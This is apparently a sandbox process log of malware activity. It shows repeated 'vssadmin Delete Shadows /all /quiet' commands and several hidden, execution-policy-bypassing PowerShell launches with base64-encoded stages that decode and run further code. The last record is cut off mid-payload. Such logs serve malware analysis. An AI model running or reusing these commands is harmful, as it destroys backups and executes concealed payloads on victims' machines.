Process
169
1360
vssadmin.exe
4588
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
170
4804
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
171
4488
vssadmin.exe
4804
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
172
4944
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
173
1152
vssadmin.exe
4944
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
174
4448
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
175
1200
vssadmin.exe
4448
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
176
3352
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
177
1716
vssadmin.exe
3352
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
178
4992
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
179
4420
vssadmin.exe
4992
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
180
3716
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
181
2304
vssadmin.exe
3716
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
182
2592
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
183
3616
vssadmin.exe
2592
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
184
1448
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
185
4724
vssadmin.exe
1448
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
186
4676
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
187
3928
vssadmin.exe
4676
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
188
4888
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
189
3116
vssadmin.exe
4888
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
190
4824
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
191
4064
vssadmin.exe
4824
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
192
5104
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
193
5052
vssadmin.exe
5104
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
194
1740
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Process
195
4964
vssadmin.exe
1740
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
196
3748
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
197
1744
vssadmin.exe
3748
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
198
3880
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
199
4932
vssadmin.exe
3880
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
200
4624
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
201
4428
vssadmin.exe
4624
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
202
916
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
203
1848
vssadmin.exe
916
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
204
3412
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
205
4360
vssadmin.exe
3412
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
206
1784
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
207
1788
vssadmin.exe
1784
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
208
4024
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
209
4608
vssadmin.exe
4024
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
210
3452
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
211
1440
vssadmin.exe
3452
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
212
1948
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
213
3736
vssadmin.exe
1948
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
214
1852
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABhADMAPQAiAEoAaQBnAGcASgBGAFoAbABjAGsASgB2AFUAMABWAFEAVQBrAFYAbQBaAFgASgBGAGIAawBOAGwATABsAFIAUABVADMAUgBTAGEAVwA1AEgASwBDAGwAYgBNAFMAdwB6AFgAUwBzAG4AVwBDAGMAdABhAGsAOQBwAFQAaQBjAG4ASwBTAEEAbwBLAEMAYwBvAEkARwA1AEYAZAB5ADEAUABRAGsAcABGAFkAMwBRAGcAUwBXADgAdQBRADIAOQB0AFUARgBKAGwAYwAxAE4ASgBiADIANABuAEsAeQBjAHUAWgBFAFYARwBKAHkAcwBuAFQARQBGAFUAUgBYAE4AMABjAG0AVgBoAGIAUwBnAGcAVwAxAE4AWgBKAHkAcwBuAGMAMwBSAGwAYgBTADUASgBiAHkANQBOAFoAUwBjAHIASgAyADEAdgBjAGwAbABUAGQAQwBjAHIASgAxAEoAbABRAFMAYwByAEoAMAAxAGQAVwAzAE0AbgBLAHkAZABaAGMAMQBSAEYASgB5AHMAbgBUAFMANQBEAEoAeQBzAG4AVAAyADUAVwBaAFYASgBVAFgAVABvADYAUgBpAGMAcgBKADEASQBuAEsAeQBkAHYASgB5AHMAbgBiAFUASgBoAFUAMABVAG4ASwB5AGMAMgBOAEgATgBVAGMAbQBsAE8AUgB5AGcAZwBhAEgAQgBOAFMARgBsADYAZABpAGMAcgBKADAATQBuAEsAeQBkAHoAUwBYAGQARQBUAFYASQBuAEsAeQBkAG0ASgB5AHMAbgBTAG0AWgBUAFIAQwBjAHIASgB6AEoAagBRAGwAcABrAFoAaQBjAHIASgB6AFUAbgBLAHkAYwAzAEoAeQBzAG4AYgBsAG8AbgBLAHkAZABIAGIAVgBkAE8AYQBGAGMAeQBXAFMAYwByAEoAMwBBAG4ASwB5AGQAVQBVAFgAUQAzAFoARABGAEIASwB5ADgAegBTAEMAYwByAEoAMABnAG4ASwB5AGQAcgBZAG4AUgBqAE4ARQA5AGgASgB5AHMAbgBjAFMAYwByAEoAMgBOAFcAVgBTAGMAcgBKAHoAUgB4AGQAbQBKAHYASgB5AHMAbgBkAFUARQBuAEsAeQBkAHoASgB5AHMAbgBZAFQAZwAwAEoAeQBzAG4AUQBqAFYAWQBTAFQAWgBoAFUAaQBjAHIASgAxAFIAUgBOAHoAaABaAFYAMwBsAG8ASgB5AHMAbgBVAFMAYwByAEoAMQBVADUAVgBsAGgASQBNADMAWgBXAFoAVABSAHgAUgBpAGMAcgBKAHoAWQB6AGQARwBnADQAYwBqAEYAUQBKAHkAcwBuAE0AMABKAFUAUQBqAEUAegBSAFUAOQBXAGQAWABBADQAUgBFAG8AbgBLAHkAZABSAFQAVgBWAE8AVgBIAE4AQgBkAGsAZAA1AFMAVgBnAG4ASwB5AGQAQwBKAHkAcwBuAGIAVABWAHQASgB5AHMAbgBUAGkAYwByAEoAegBrAG4ASwB5AGQATABOADEAUgB1AGIAVQBOAGkAUgBTAGMAcgBKADMATgBJAE4AaQBjAHIASgAwAGgARgBUAEcAVgBMAFQAQwBzAHIAUgBTAGMAcgBKADAAZAB4AFoAUwBjAHIASgAzAE0AbgBLAHkAZABRAE0ARQBKAG8ASgB5AHMAbgBjAEMAYwByAEoAMAAwAG4ASwB5AGMAcABMAEMAYwByAEoAMQB0AFQAVwBTAGMAcgBKADMATgBVAFoAVQAwAHUASgB5AHMAbgBTAFcAOAB1AFEAMgA5AE4AYwBIAEoAbABVADEATgBKAFQAMAA0AHUAUQAyADkATgBjAEYASgBsAGMAMwBOAHAAYgB5AGMAcgBKADAANQBOAGIAeQBjAHIASgAyAFIAbABYAFQAbwA2AFIARwBWAEQAVAAyADEAdwBVAG0AVgB6AEoAeQBzAG4AVQB5AEEAcABTAHkAYwByAEoAMwBKAHQASQBHAFoAdgBjAGkAYwByAEoAMgBWAEIAWQAyAGcAbgBLAHkAYwB0AGIAMABKAHEAUgBVAE4AVQBKAHkAcwBuAEkAQwBjAHIASgAzAHMAbgBLAHkAYwBnAGIAawBWADMATABTAGMAcgBKADAAOQBDAFMAawBWAGoAZABDAEIAVABlAFgATgAwAFIAVwAwAHUAUwBVADgAbgBLAHkAYwB1AFUAMwBSAHkAUgBXAEYATgBVAGsAVQBuAEsAeQBkAEIASgB5AHMAbgBSAEUAVgBTAEoAeQBzAG4ASwBDAEEAMABlAGwASgBmAEwARgB0AHoAZQBTAGMAcgBKADMATgBVAFoAVQAwAG4ASwB5AGMAdQBWAEUAVgBZAFYAQwA1AGwAVABrAE4AUABaAEcAbABPAFIAMQAwADYASgB5AHMAbgBPAGsARgBUAFkAMgBsAHAASQBDAGsAZwBmAFMAYwByAEoAMAB0AHkASgB5AHMAbgBiAFMAQgBtAFQAMQBKAEYAUQBXAE4ASQBMAFUAOQBDAGEAbQBWAGoASgB5AHMAbgBkAEMAQgA3AEkARABSADYAVQBsADgAdQBVAG0AVgBCAFIARgBSAFAAWgBXADQAbgBLAHkAZABrAEsAQwBrAG4ASwB5AGMAZwBKAHkAcwBuAGYAUwBsAEwASgB5AHMAbgBjAG0AMABnAEoAeQBzAG4ASgBpAGMAcgBKAHkAQQBvAEkARABRAG4ASwB5AGQANgBVAG0AVgBPAGQAagBvAG4ASwB5AGQARABUADIAMQBUAFUARwBWAGoAVwB6AFEAcwBNAGoAUQBuAEsAeQBjAHMATQBqAFYAZABMAFUAcABQAGEAVQA0AG4ASwB5AGQAbwBjAEUAMQBvAGMAQwBjAHIASgAwADAAcABKAHkAawB1AFUAbQBWAHcAVABFAEYAagBSAFMAZwBvAFcAMgBOAG8AWQBWAEoAZABOAFQASQByAFcAMgBOAG8AWQBWAEoAZABNAFQASQB5AEsAMQB0AGoAYQBHAEYAUwBYAFQAZwB5AEsAUwB3AG4ASgBDAGMAcABMAGwASgBsAGMARQB4AEIAWQAwAFUAbwBLAEYAdABqAGEARwBGAFMAWABUAGMAMQBLADEAdABqAGEARwBGAFMAWABUAEUAeABOAEMAdABiAFkAMgBoAGgAVQBsADAAeABNAEQAawBwAEwAQwBkADgASgB5AGsAdQBVAG0AVgB3AFQARQBGAGoAUgBTAGcAbgBhAEgAQgBOAEoAeQB4AGIAYwAzAFIAUwBhAFcANQBuAFgAVgB0AGoAYQBHAEYAUwBYAFQATQA1AEsAUwBrAD0AIgANAAoAJABiADMAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAdABmADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABhADMAKQApAA0ACgBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAGIAMwA=
䗸Y쨈Z
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
215
4652
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABhADQAPQAiAEsAQwBjAGcAYQBTAGMAcgBKADAANABuAEsAeQBkADIAYgAyAHQARgBMAFUAVgA0AEoAeQBzAG4AYwBIAEoARgBKAHkAcwBuAGMAMwBOAHAASgB5AHMAbgBiADIANABnAEsARQA0AG4ASwB5AGQARgBKAHkAcwBuAGQAeQAxAHYAUQBpAGMAcgBKADIAbwBuAEsAeQBkAEYASgB5AHMAbgBRADEAUQBnAEoAeQBzAG4ASQBGAE0AbgBLAHkAZABaAFUAMQBSAEYAVABTADQAbgBLAHkAZABKAEoAeQBzAG4AVAB5AGMAcgBKAHkANQB6AGQASABKAGwAWQBVADAAbgBLAHkAZAB5AFoAUwBjAHIASgAyAEYARQBSAFgASQBvAEsARQA1AEYASgB5AHMAbgBkAHkAMQB2AEoAeQBzAG4AUQBtAHAARgBRAHkAYwByAEoAMQBRAGcAUwBVADgAdQBRAHkAYwByAEoAMgA5AE4ASgB5AHMAbgBjAEgASgBsAGMAeQBjAHIASgAxAE0AbgBLAHkAZABwAFQAeQBjAHIASgAyADQAdQBaAEcAVgBtAGIARwBGAFUASgB5AHMAbgBSAFgATgAwAEoAeQBzAG4AVQBrAFUAbgBLAHkAZABoAGIAUwBnAGcAVwAzAE0AbgBLAHkAZAA1AFUAMQBRAG4ASwB5AGQAbABUAFMANQBKAEoAeQBzAG4AVAB5ADUAdABSAFcAMQB2AGMAbABsAFQAZABDAGMAcgBKADEASgBsAFkAVwAwAG4ASwB5AGQAZABXAHkAYwByAEoAMwBOADUAYwAxAFEAbgBLAHkAZABsAFQAUwA1AEQAYgAwADUAVwBSAFMAYwByAEoAMwBKAFUAWABUAG8ANgBSAGkAYwByAEoAMwBKAFAAYgBTAGMAcgBKADAASgBoAEoAeQBzAG4AVQAwAFUAbgBLAHkAYwAyAEoAeQBzAG4ATgBDAGMAcgBKADEATQBuAEsAeQBkAFUAYwBrAGwAdQBSAHkAYwByAEoAeQBoAHQAVwBTAGMAcgBKADAAMAB3AEoAeQBzAG4ATwBVADQAbgBLAHkAZABSAGMAUwBjAHIASgAyAG8AbgBLAHkAZABoAGMAUwBjAHIASgAzAEoAVQBZAFgATgB5AFYARwBGADEAYwBsAFEAbgBLAHkAZABoAEoAeQBzAG4AYgAxAFkAbgBLAHkAZABXAFQARgBGAFUAVgBpAGMAcgBKADAANQBSAFQARABGAEkAVwBDAGMAcgBKADEAVQBuAEsAeQBkAFYATwBDAGMAcgBKADMAUQBuAEsAeQBjAHcAVQBUAE4AUQBlAGkAYwByAEoAMgBaAFMAVQBFAEUAbgBLAHkAZABxAFQARwBSAG4AVgBHAGMAbgBLAHkAZAB5AFQAaQBjAHIASgAxAFoAcwBKAHkAcwBuAFoARgBWADMAUgB5AGMAcgBKADIAOAB5AFEAawBOAHIAYwBrADUAdgBSAFMAYwByAEoAMwBKAE8ATgBtADgAbgBLAHkAZABXAEoAeQBzAG4AWgB5AGMAcgBKADIAMABuAEsAeQBkAHIAVQBFADAAbgBLAHkAYwB2AFcAVQB0AEUASgB5AHMAbgBOAEMAYwByAEoAegBRAG4ASwB5AGQAQgBOAG0AZAB2AFUARQBKAE8AUwBTAGMAcgBKADEAWgBCAFMAbgBoAG0AWgAwAGMAbgBLAHkAZABSAFUAeQBjAHIASgAwAFYANgBTAGsAdwB6AFkAMABkAGgAYwBYAEEAbgBLAHkAZABTAFYAUwBjAHIASgAwADUATwBVAFMAYwByAEoAMQBaADMAVgBTAGMAcgBKADMAbAB4AEoAeQBzAG4AYQBDAGMAcgBKADEAWQBuAEsAeQBkAFYAYwBYAFYATwBjAGoAbABaAEoAeQBzAG4AUQB5AGMAcgBKADAAZABIAEoAeQBzAG4AUwBTAGMAcgBKADAASgB6AEoAeQBzAG4AUQBrADkAMABKAHkAcwBuAE0AVgBNAG4ASwB5AGQAagBNAEUASgBYAE4AVwBGAHgASgB5AHMAbgBjAGkAYwByAEoAMwBFAG4ASwB5AGQAdQBiAG0AMABuAEsAeQBkAFcASgB5AHMAbgBaAFYAZAB1AE4AVABJAG4ASwB5AGQAeABiADIARQBuAEsAeQBkAHMAVQBTAGMAcgBKADAATgAzAFEAUwBjAHIASgB6ADAAbgBLAHkAZAB0AFcAUwBjAHIASgAwADAAbgBLAHkAYwBnAEsAUwB3AGcAVwAzAE0AbgBLAHkAZABaAGMAMQBSAEYAYgBTADUASgBiAHkANQBqAGIAMAAxAFEASgB5AHMAbgBVAGkAYwByAEoAMABWAHoAVQB5AGMAcgBKADIAbABQAFQAaQA1AEQASgB5AHMAbgBiADAAMQBRAFUAawBWAHoAVQAwAGwAUABUAG0AMQBQAEoAeQBzAG4AWgBFAFUAbgBLAHkAZABkAEoAeQBzAG4ATwBqAHAAawBSAFMAYwByAEoAMABOAFAAVABYAEIAUwBaAFgATgBUAEkAQwBrAGcASgB5AHMAbgBLAFMAQQBzAEkARgB0AHoAZQBWAE4AMABKAHkAcwBuAFIAUwBjAHIASgAyADAAdQBKAHkAcwBuAFYAQwBjAHIASgAwAFYANABkAEMANQBGAFQAawBOAHYASgB5AHMAbgBSAEcAbAB1AFoAMQAwADYASgB5AHMAbgBPAGkAYwByAEoAMgBFAG4ASwB5AGQAegBZAHkAYwByAEoAMABrAG4ASwB5AGQAcABLAFMAQQBuAEsAeQBjAHAATABuAEkAbgBLAHkAZABGAFkAVwBRAG4ASwB5AGQAVQBKAHkAcwBuAFQAMgBVAG4ASwB5AGQAdQBSAEMAZwBwAEoAeQBrAHUAYwBrAFYAUQBUAEcARgBqAFIAUwBnAG8AVwAwAE4AbwBRAFgASgBkAE0AVABBADUASwAxAHQARABhAEUARgB5AFgAVABnADUASwAxAHQARABhAEUARgB5AFgAVABjADMASwBTAHgAYgBjADEAUgBTAFMAVwA1AG4AWABWAHQARABhAEUARgB5AFgAVABNADUASwBTAEIAOABJAEMANABnAEsAQwBBAGsAWgBXADUAMgBPAG0ATgB2AFQAVgBOAHcAWgBVAE4AYgBOAEMAdwB4AE4AUwB3AHkATgBWADAAdABhAG0AOQBKAGIAaQBjAG4ASwBRAD0APQAiAA0ACgAkAGIANAAgAD0AIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQB0AGYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEANAApACkADQAKAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAYgA0AA==
즸Zา
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Process
216
4468
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABhADUAPQAiAEoAaQBnAGcASgBIAE4AbwBSAFUAeABNAGEAVwBSAGIATQBWADAAcgBKAEYATgBJAFoAVwB4AE0AUwBXAFIAYgBNAFQATgBkAEsAeQBkAFkASgB5AGsAbwBJAEMAZwBvAEoAeQBBAHUASwBDAEIANwBNAEgAMQBRAFUAMgBoAHYAYgBXAFUAbgBLAHkAZABiAEoAeQBzAG4ATQBqAEYAZABLADMAcwB3AEoAeQBzAG4AZgBWAEIAVABKAHkAcwBuAGEARwA4AG4ASwB5AGQAdABSAFYAcwB6AE4ARgAwAHIAZQB6AEYAOQBlAEgAcwBuAEsAeQBjAHgAZgBTAGsAZwBLAEMAYwByAEoAeQBCAE8AWgBWAGMAdABUADIASQBuAEsAeQBkAHEAUgBXAE4AMABJAEYATgBaAFUAMQBRAG4ASwB5AGQARgBUAFMANQBwAFQAeQBjAHIASgB5ADUAVABWAEYASgBGAEoAeQBzAG4AWQBXADAAbgBLAHkAZAB5AEoAeQBzAG4AUgBVAEYAawBSAFYASQBvAEkAQwBnAG4ASwB5AGMAZwBUAG0AVgBYAEoAeQBzAG4ATABVADkAaQBhAGsAVgBqAGQAQwBCAEoAYgB5ADUARABUAHkAYwByAEoAMgAwAG4ASwB5AGQAUQBVAGkAYwByAEoAMgBWAFQAYwAwAGwAdgBUAGkANQBFAFoAVQBaAHMAWQBYAFIAbABjADMAUgB5AFIAVQBGAE4ASwBGAHQAegBKAHkAcwBuAFcAWABOADAAUgBXADAAdQBTAFUAOAB1AFQAUwBjAHIASgAyAFYATgBiAHkAYwByAEoAMQBJAG4ASwB5AGQANQBjADEAUgB5AFIAUwBjAHIASgAyAEYAdABYAFYAdAB6AEoAeQBzAG4AZQBWAE0AbgBLAHkAZABVAFIAVwAwAHUAUQAwADkAdQBWAGsAVgBTAFYARgAwAG4ASwB5AGMANgBPAG0AWgB5AFQAMgAxAGkAWQBWAE4AbABKAHkAcwBuAE4AagBSAHoASgB5AHMAbgBkAEgASgBKAFQAbQBjAG4ASwB5AGMAbwBKAHkAcwBuAGUAegBGADkAVgBTAGMAcgBKAHoAbABPAFUAWABFAG4ASwB5AGQAcQBZAFcAOQB5AFYARwBGADEAYwBsAFIAaABjADMASQBuAEsAeQBkAFUAWQBYAEUAbgBLAHkAZABXAFYAawB4AFIAVgBDAGMAcgBKADEAWgBPAFUAVwBRAG4ASwB5AGMAdwBPAEMAYwByAEoAMwBRAG4ASwB5AGMAdwBVAFQATgBRAFYAbQBSAGsAVQBsAFIAMwBZAG0AbABGAGEAVQBSAFAATwBVAFUAdgBTADEATgBzAFcARgBoAFcAUQBVAEYAeABKAHkAcwBuAFEAbgBGAHYATQBIAEYAUgBKAHkAcwBuAFYAbgBCAE4AVQBVAG8AbgBLAHkAZAB3AFoAMgBFAG4ASwB5AGQAbgBNADAARQBuAEsAeQBkAHAAYwBFAHAAVQBKAHkAcwBuAFQAVwB0ADIAWgBEAGcAMABkAG4ARgBCAEoAeQBzAG4AVQBYAGsAMABOAEUAMQA2AFoAMABjAG4ASwB5AGQAUgBOAEYATgBHAEsAMgBVAG4ASwB5AGQATgBKAHkAcwBuAFYAawBKAFkAYQBsAGwASgBaAFgAZwBuAEsAeQBkAEMAVwBWAFIAeABRAHoAWQBuAEsAeQBkAG4AUwBWAEoARABUAGkAYwByAEoAMQBGAGgAYgBUAFUAbgBLAHkAYwByAFYAMQBjAG4ASwB5AGQAdwBRADAAeAAwAFUAMgBzAG4ASwB5AGQAbABlAEYAUQB4AGQAMQBFAG4ASwB5AGQAQgBlAHkAYwByAEoAegBGADkASwBTAHcAZwBXAHkAYwByAEoAMwBOAFoAVQAzAFIAbABUAFMAYwByAEoAeQA1AEoAVAB5ADUAagBUAHkAYwByAEoAMgAxAFEAYwBrAFYAVABjADAAbABQAGIAaQA1AEQAVAAyADEAdwBjAG0AVQBuAEsAeQBkAFQAVQAyAGwAdgBUAG0AMQB2AFoARQBWAGQATwBqAHAAawBSAFUATgB2AFQAVgBBAG4ASwB5AGQAUwBSAFYATgBUAEkAQwBrAG4ASwB5AGMAcABMAEYAdAB6AGUAWABOADAAUgBTAGMAcgBKADIAMAB1AEoAeQBzAG4AVgBHAFYAWQBWAEMANQBsAGIAawBOAHYASgB5AHMAbgBaAEMAYwByAEoAMgBsAHUAWgAxADAANgBPAGsARgB6AFEAMABsAEoASgB5AHMAbgBLAFMAYwByAEoAeQBBAHAATABuAEoAbABRAFUAUgAwAFQAMABWAE8ASgB5AHMAbgBSAEMAZwBwAEoAeQBrAHQAWgBsAHQAagBhAEUARgB5AFgAVABNADIATABGAHQAagBhAEUARgB5AFgAVABNADUASwBTAGsAPQAiAA0ACgAkAGIANQAgAD0AIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQB0AGYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEANQApACkADQAKAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAYgA1AA==
ଲ
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
217
668
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABhADYAPQAiAEoAaQBBAG8ASQBDAFIAegBhAEUAVgBNAGIARwBsAGsAVwB6AEYAZABLAHkAUgB6AGEARQBWAHMAVABHAGwAawBXAHoARQB6AFgAUwBzAG4AVwBDAGMAcABJAEMAZwBvAEoAMABsAEYASgB5AHMAbgBlAEMAYwByAEoAeQBnAGcAVABrAFYAMwBKAHkAcwBuAEwAUwBjAHIASgAwADkAQwBTAG0AVgBEAGQAQwBCAFQASgB5AHMAbgBlAFYATgBVAFoAVwAwAG4ASwB5AGMAdQBTAFMAYwByAEoAMgA4AHUASgB5AHMAbgBVAHkAYwByAEoAMQBSAFMAWgBVAEUAbgBLAHkAZAB0AGMAbQBVAG4ASwB5AGQAQgBaAEcAVQBuAEsAeQBkAFMASwBDAGgATwBSAFgAYwB0AFQAMABKAEsAWgBVAE4AMABKAHkAcwBuAEkARQBsAFAATABrAE4AUABiAFgAQgBTAFIAWABOAHoAUwBTAGMAcgBKADIAOQB1AEwAaQBjAHIASgAyAFIAbABSAGsAeABCAEoAeQBzAG4AZABHAFUAbgBLAHkAZAB6AFYAQwBjAHIASgAzAEkAbgBLAHkAZABGAFkAVQAwAG8AVwAwAGsAbgBLAHkAZAB2AEwAbQAwAG4ASwB5AGQARgBiAFMAYwByAEoAMAA5AFMAZQBWAE0AbgBLAHkAZAAwAGMAbQBWAGgASgB5AHMAbgBUAFYAMABnAEoAeQBzAG4AVwB5AGMAcgBKADAATgB2AGIAbgBaAEYAVQBuAFIAZABPAGkAYwByAEoAegBwAG0AVQBpAGMAcgBKADAAOQB0AFkAbQBGAFQASgB5AHMAbgBSAFQAWQAwAEoAeQBzAG4AYwAxAFIAeQBKAHkAcwBuAFMAVQA0AG4ASwB5AGQAbgBLAEMAYwByAEoAMwBoADUATQBpAGMAcgBKAHoAQQA1AFQAbABGAHgAYQBtAEYAdwBKAHkAcwBuAGMAbABSAGgASgB5AHMAbgBjAHkAYwByAEoAMwBKAFUASgB5AHMAbgBZAFgAVgB5AFYAQwBjAHIASgAyAEYAeABKAHkAcwBuAGMAbABSAGgAYgAxAFkAbgBLAHkAZABrAFMAawA0AG4ASwB5AGQAVgBKAHkAcwBuAE0AQwBjAHIASgB5ADkATgBKAHkAcwBuAFUAeQBjAHIASgB6AEEAMQBWAGoARQBuAEsAeQBjAHgASgB5AHMAbgBTAEQATgBDAFQAeQBjAHIASgAwAGwAVABTAFUAMAAwAGMAawBKAG8ASgB5AHMAbgBUAEgAVgB4AEoAeQBzAG4AVQAxAGMAMgBKAHkAcwBuAGUAaQBjAHIASgAzAEIAdABOAFQAWgB3AGIAMABzAG4ASwB5AGQAUgBRAHoAQgBSAGUARgBsAGEASgB5AHMAbgBaAHoAbABSAGMARQBGAEUAWgBTAGMAcgBKADEAaABQAEsAMQBFAG4ASwB5AGQAWABWAGwARgBGAEoAeQBzAG4AVgBTAGMAcgBKADMAQQByAFYAVQBSAEQAUwAwAFEAbgBLAHkAYwA